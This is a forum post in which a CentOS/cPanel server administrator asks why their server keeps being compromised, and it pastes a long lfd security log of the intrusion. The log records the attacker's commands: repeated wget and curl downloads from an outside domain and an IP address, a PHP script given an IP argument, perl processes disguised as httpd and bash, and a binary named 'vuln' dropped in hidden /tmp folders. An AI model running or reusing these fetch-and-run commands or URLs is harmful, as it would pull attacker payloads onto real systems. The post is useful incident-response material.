Server being broken into and I can't figure out how


Patrick
patricknn

(uses Other)

Posted on 30/03/2015 - 11:53h

Folks, I have a CentOS 6 + cPanel server, and it is somehow being broken into by someone located in Germany.

The attacker copies some files onto the server, executes them, and deletes them.

I have already tried a lot of things to track it down, but I cannot find out how they manage to copy those files.

I pulled an LFD log and found this:

Mar 29 03:37:10 server lfd[13483]: *Suspicious Process* PID:29230 PPID:13353 User:centrode Uptime:1029 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 03:43:13 server lfd[20980]: *Suspicious Process* PID:22300 PPID:16728 User:nobody Uptime:107 secs EXE:/usr/local/bin/php CMD:php wn.php 80.153.236.231
Mar 29 03:52:11 server lfd[18103]: *Suspicious Process* PID:506 PPID:13353 User:cavvesc Uptime:168 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:00:12 server lfd[29566]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:358981 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 04:01:10 server lfd[14656]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1027440 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 04:05:11 server lfd[19777]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 04:05:12 server lfd[19777]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:05:12 server lfd[19777]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 04:05:14 server lfd[19778]: *Suspicious Process* PID:23726 PPID:3660 User:nobody Uptime:98 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xgm.txt
Mar 29 04:08:13 server lfd[7008]: *Suspicious Process* PID:3727 PPID:3124 User:bppromo Uptime:122 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:10:11 server lfd[9845]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:10:12 server lfd[9845]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:10:13 server lfd[9845]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:10:14 server lfd[9845]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:10:14 server lfd[9845]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 04:11:15 server lfd[27443]: *Suspicious Process* PID:29078 PPID:3124 User:cavvesc Uptime:215 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:12:13 server lfd[12614]: *Suspicious Process* PID:22586 PPID:6243 User:nobody Uptime:76 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yvj.txt
Mar 29 04:15:12 server lfd[32481]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:15:12 server lfd[32481]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 04:16:12 server lfd[17983]: *Suspicious Process* PID:10675 PPID:3124 User:bppromo Uptime:247 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:20:14 server lfd[22173]: *Suspicious Process* PID:30235 PPID:30210 User:nobody Uptime:85 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xvp.txt
Mar 29 04:21:17 server lfd[7334]: *Suspicious Process* PID:15784 PPID:15736 User:nobody Uptime:83 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xfc.txt
Mar 29 04:23:14 server lfd[9085]: *Suspicious Process* PID:15845 PPID:15736 User:nobody Uptime:91 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xfc.txt
Mar 29 04:25:14 server lfd[11345]: *Suspicious Process* PID:18286 PPID:18189 User:nobody Uptime:88 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xgv.txt
Mar 29 04:27:13 server lfd[13592]: *Suspicious Process* PID:23762 PPID:3124 User:centrode Uptime:1083 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:33:13 server lfd[19286]: *Suspicious Process* PID:32709 PPID:3124 User:cavvesc Uptime:1413 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:36:16 server lfd[5546]: *Suspicious Process* PID:10217 PPID:3124 User:bppromo Uptime:1781 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:38:15 server lfd[7394]: *Suspicious Process* PID:6332 PPID:23099 User:nobody Uptime:117 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xmi.txt
Mar 29 04:42:14 server lfd[11397]: *Suspicious Process* PID:6075 PPID:3124 User:cavvesc Uptime:1491 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 04:57:16 server lfd[3183]: *Suspicious Process* PID:14988 PPID:3124 User:bppromo Uptime:199 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 05:00:16 server lfd[17949]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:362585 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 05:01:17 server lfd[998]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1031045 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 05:01:18 server lfd[998]: *Suspicious Process* PID:5233 PPID:5175 User:nobody Uptime:108 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xwm.txt
Mar 29 05:04:17 server lfd[15935]: *Suspicious Process* PID:16951 PPID:16664 User:nobody Uptime:120 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xmf.txt
Mar 29 05:05:15 server lfd[31382]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 05:05:16 server lfd[31382]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:05:17 server lfd[31382]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 05:10:15 server lfd[12931]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:10:15 server lfd[12931]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:10:16 server lfd[12931]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:10:16 server lfd[12931]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:10:17 server lfd[12931]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 05:14:16 server lfd[11711]: *Suspicious Process* PID:2053 PPID:3124 User:bppromo Uptime:1025 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 05:15:15 server lfd[27544]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:15:16 server lfd[27544]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 05:15:17 server lfd[27545]: *Suspicious Process* PID:2750 PPID:3124 User:bppromo Uptime:1082 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 05:16:16 server lfd[11804]: *Suspicious Process* PID:20047 PPID:20030 User:nobody Uptime:87 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yyd.txt
Mar 29 05:16:17 server lfd[11804]: *Suspicious Process* PID:25917 PPID:3124 User:bppromo Uptime:311 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 05:21:18 server lfd[28903]: *Suspicious Process* PID:9035 PPID:20030 User:nobody Uptime:72 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yyd.txt
Mar 29 05:24:15 server lfd[12936]: *Suspicious Process* PID:1019 PPID:3124 User:bppromo Uptime:1750 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 05:37:22 server lfd[29574]: *Suspicious Process* PID:31228 PPID:31213 User:nobody Uptime:114 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yvo.txt
Mar 29 05:40:19 server lfd[13455]: *Suspicious Process* PID:22477 PPID:22448 User:nobody Uptime:86 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xvm.txt
Mar 29 06:00:23 server lfd[3206]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:366191 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 06:01:20 server lfd[17842]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1034650 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 06:05:20 server lfd[13907]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 06:05:21 server lfd[13907]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:05:22 server lfd[13907]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 06:10:21 server lfd[24421]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:10:21 server lfd[24421]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:10:22 server lfd[24421]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:10:24 server lfd[24421]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:10:25 server lfd[24421]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 06:15:21 server lfd[2952]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:15:21 server lfd[2952]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 06:23:21 server lfd[25702]: *Suspicious Process* PID:6368 PPID:6306 User:nobody Uptime:79 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/ydz.txt
Mar 29 06:38:24 server lfd[24945]: *Suspicious Process* PID:7554 PPID:10423 User:cavvesc Uptime:203 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 06:40:21 server lfd[22443]: *Suspicious Process* PID:913 PPID:804 User:nobody Uptime:86 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yhk.txt
Mar 29 06:46:28 server lfd[18057]: *Suspicious Process* PID:23725 PPID:23613 User:nobody Uptime:104 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xef.txt
Mar 29 06:47:23 server lfd[951]: *Suspicious Process* PID:3366 PPID:10423 User:bppromo Uptime:1532 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 06:49:24 server lfd[32066]: *Suspicious Process* PID:6291 PPID:18484 User:nobody Uptime:101 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yuo.txt
Mar 29 07:00:25 server lfd[2352]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:369793 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 07:01:23 server lfd[17339]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1038252 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 07:05:22 server lfd[12066]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 07:05:23 server lfd[12066]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:05:23 server lfd[12066]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 07:08:24 server lfd[24880]: *Suspicious Process* PID:6215 PPID:32591 User:nobody Uptime:75 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yaj.txt
Mar 29 07:10:23 server lfd[22719]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:10:23 server lfd[22719]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:15:24 server lfd[31424]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:15:26 server lfd[31424]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:15:27 server lfd[31424]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 07:15:28 server lfd[31424]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:15:29 server lfd[31424]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 07:18:28 server lfd[10806]: *Suspicious Process* PID:24121 PPID:10423 User:bppromo Uptime:339 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 07:24:26 server lfd[2778]: *Suspicious Process* PID:19287 PPID:19245 User:nobody Uptime:63 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xwb.txt
Mar 29 07:31:31 server lfd[8998]: *Suspicious Process* PID:28303 PPID:10423 User:cavvesc Uptime:973 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 08:00:36 server lfd[4804]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:373397 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 08:01:28 server lfd[18721]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1041857 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 08:04:28 server lfd[28368]: *Suspicious Process* PID:5963 PPID:5878 User:nobody Uptime:98 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yox.txt
Mar 29 08:05:27 server lfd[9800]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 08:05:27 server lfd[9800]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:05:27 server lfd[9800]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 08:10:28 server lfd[16626]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:10:28 server lfd[16626]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:10:30 server lfd[16629]: *Suspicious Process* PID:6663 PPID:10423 User:bppromo Uptime:741 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 08:13:28 server lfd[25743]: *Suspicious Process* PID:6682 PPID:10423 User:bppromo Uptime:920 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 08:15:29 server lfd[21360]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:15:30 server lfd[21360]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:15:31 server lfd[21360]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 08:20:29 server lfd[26069]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:20:29 server lfd[26069]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 08:26:29 server lfd[12171]: *Suspicious Process* PID:8391 PPID:2533 User:bppromo Uptime:573 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 08:31:33 server lfd[15616]: *Suspicious Process* PID:11144 PPID:2533 User:cavvesc Uptime:861 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 08:58:35 server lfd[25465]: *Suspicious Process* PID:11336 PPID:2533 User:cavvesc Uptime:1076 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 09:01:37 server lfd[32341]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1045465 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 09:01:41 server lfd[32341]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:377065 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 09:04:46 server lfd[6248]: *Suspicious Process* PID:15335 PPID:14856 User:nobody Uptime:109 secs EXE:/usr/bin/wget CMD:wget http://109.228.25.87/.ips/xkm
Mar 29 09:05:35 server lfd[19381]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 09:05:35 server lfd[19381]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:05:37 server lfd[19381]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 09:05:50 server lfd[19382]: *Suspicious Process* PID:28945 PPID:26565 User:nobody Uptime:103 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xjy.txt
Mar 29 09:06:38 server lfd[32638]: *Suspicious Process* PID:10096 PPID:28123 User:nobody Uptime:101 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yjk.txt
Mar 29 09:06:45 server lfd[32638]: *Suspicious Process* PID:17017 PPID:14856 User:nobody Uptime:71 secs EXE:/usr/bin/curl CMD:curl -O http://109.228.25.87/.ips/xkm
Mar 29 09:10:35 server lfd[18941]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:10:36 server lfd[18941]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:15:36 server lfd[19949]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:15:37 server lfd[19949]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:15:38 server lfd[19949]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 09:20:36 server lfd[20286]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:20:36 server lfd[20286]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 09:26:41 server lfd[32028]: *Suspicious Process* PID:9172 PPID:8957 User:bppromo Uptime:1306 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 09:31:38 server lfd[31329]: *Suspicious Process* PID:7086 PPID:3403 User:nobody Uptime:112 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xdz.txt
Mar 29 09:37:41 server lfd[12650]: *Suspicious Process* PID:5845 PPID:8957 User:cavvesc Uptime:935 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 09:46:41 server lfd[31505]: *Suspicious Process* PID:11881 PPID:11843 User:nobody Uptime:92 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xsm.txt
Mar 29 10:01:40 server lfd[29015]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1049069 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 10:02:49 server lfd[9309]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:380730 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 10:05:40 server lfd[14639]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 10:05:41 server lfd[14639]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:05:42 server lfd[14639]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 10:10:39 server lfd[11772]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:10:40 server lfd[11772]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:15:40 server lfd[9048]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:15:41 server lfd[9048]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:15:41 server lfd[9048]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 10:15:55 server lfd[9051]: *Suspicious Process* PID:27742 PPID:24669 User:nobody Uptime:66 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/yat.txt
Mar 29 10:18:40 server lfd[14325]: *Suspicious Process* PID:5200 PPID:8957 User:bppromo Uptime:512 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 10:20:40 server lfd[6355]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 10:20:41 server lfd[6355]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:01:51 server lfd[12895]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1052672 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 11:04:01 server lfd[2528]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:384392 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 11:05:42 server lfd[24162]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 11:05:43 server lfd[24162]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:10:42 server lfd[16455]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 11:10:43 server lfd[16455]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:10:44 server lfd[16455]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:15:44 server lfd[9904]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:15:45 server lfd[9904]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:15:46 server lfd[9904]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 11:19:47 server lfd[24321]: *Suspicious Process* PID:4466 PPID:8957 User:centrode Uptime:954 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 11:20:44 server lfd[3726]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:20:46 server lfd[3726]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 11:21:46 server lfd[14647]: *Suspicious Process* PID:8425 PPID:8957 User:bppromo Uptime:1052 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 11:22:50 server lfd[25967]: *Suspicious Process* PID:9223 PPID:9036 User:nobody Uptime:93 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yee.txt
Mar 29 11:34:57 server lfd[31890]: *Suspicious Process* PID:17411 PPID:15638 User:nobody Uptime:81 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/ypj.txt
Mar 29 11:47:51 server lfd[14768]: *Suspicious Process* PID:2829 PPID:2462 User:nobody Uptime:65 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xet.txt
Mar 29 12:02:48 server lfd[11674]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1056336 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 12:03:48 server lfd[22110]: *Suspicious Process* PID:2518 PPID:2476 User:nobody Uptime:114 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/yqc.txt
Mar 29 12:04:50 server lfd[32531]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:388058 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 12:05:47 server lfd[11759]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 12:05:49 server lfd[11759]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:07:59 server lfd[961]: *Suspicious Process* PID:18649 PPID:17785 User:nobody Uptime:79 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xdq.txt
Mar 29 12:10:47 server lfd[1365]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 12:10:49 server lfd[1365]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:10:49 server lfd[1365]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:15:47 server lfd[21748]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:15:48 server lfd[21748]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:15:48 server lfd[21748]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 12:20:47 server lfd[9285]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:20:48 server lfd[9285]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 12:43:31 server lfd[11239]: *Suspicious Process* PID:30464 PPID:29381 User:nobody Uptime:73 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xad.txt
Mar 29 12:46:49 server lfd[19783]: *Suspicious Process* PID:1541 PPID:8957 User:cavvesc Uptime:669 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 13:02:55 server lfd[17222]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1059940 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 13:05:44 server lfd[3632]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:391662 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 13:05:50 server lfd[13108]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 13:10:50 server lfd[28792]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:10:52 server lfd[28792]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 13:10:55 server lfd[28792]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:15:50 server lfd[12534]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:15:52 server lfd[12534]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:15:54 server lfd[12534]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:15:55 server lfd[12534]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 13:20:50 server lfd[28203]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 13:20:52 server lfd[28203]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:04:12 server lfd[2525]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1063603 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 14:08:46 server lfd[5932]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:395443 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 14:10:54 server lfd[30977]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 14:10:55 server lfd[30977]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:15:53 server lfd[10371]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 14:15:54 server lfd[10371]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:15:56 server lfd[10371]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:20:54 server lfd[20531]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:20:55 server lfd[20531]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:20:57 server lfd[20531]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 14:20:59 server lfd[20531]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:25:54 server lfd[30662]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 14:51:50 server lfd[5343]: *Suspicious Process* PID:17578 PPID:15821 User:nobody Uptime:139 secs EXE:/usr/bin/curl CMD:curl -O http://remarcable.net/images/a/xgn.txt
Mar 29 15:06:02 server lfd[7456]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1067327 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
